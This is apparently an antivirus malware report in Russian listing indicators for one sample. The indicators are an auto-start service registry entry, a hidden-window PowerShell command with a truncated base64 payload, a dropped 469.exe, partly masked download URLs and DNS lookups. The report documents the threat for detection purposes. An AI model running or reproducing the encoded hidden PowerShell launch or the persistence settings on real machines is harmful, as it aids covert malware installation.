Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\radiopdeft] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\radiopdeft] 'ImagePath' = '"%WINDIR%\SysWOW64\radiopdeft.exe"'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABSAHQAdgBwAGgAeQBhAHUAaQA9ACcAUQByAG8AcwBjAGUAagBhACcAOwAkAFMAYQBwAGMAegB5AGcAeABjACAAPQAgACcANAA2ADkAJwA7ACQAVAB1AGcAbQBmAGYAZwBtAHkAZwB6AD0AJwBDAGwAYwBmAGMAZQB1AGYAawBvAGoAJwA...
- %HOMEPATH%\469.exe
- %HOMEPATH%\469.exe в %WINDIR%\syswow64\radiopdeft.exe
- http://ce####nbrazil.com/wp-content/themes/alternate-lite/89m-m0oey4scz-463/
- http://15#.#46.246.238/B2CjN0rc
- DNS ASK aq###uore.com
- DNS ASK ec#############205.ap-southeast-2.compute.amazonaws.com
- DNS ASK ce####nbrazil.com
- '%HOMEPATH%\469.exe'
- '%WINDIR%\syswow64\radiopdeft.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABSAHQAdgBwAGgAeQBhAHUAaQA9ACcAUQByAG8AcwBjAGUAagBhACcAOwAkAFMAYQBwAGMAegB5AGcAeABjACAAPQAgACcANAA2ADkAJwA7ACQAVAB1AGcAbQBmAGYAZwBtAHkAZwB6AD0AJwBDAGwAYwBmAGMAZQB1AGYAawBvAGoAJwA...' (со скрытым окном)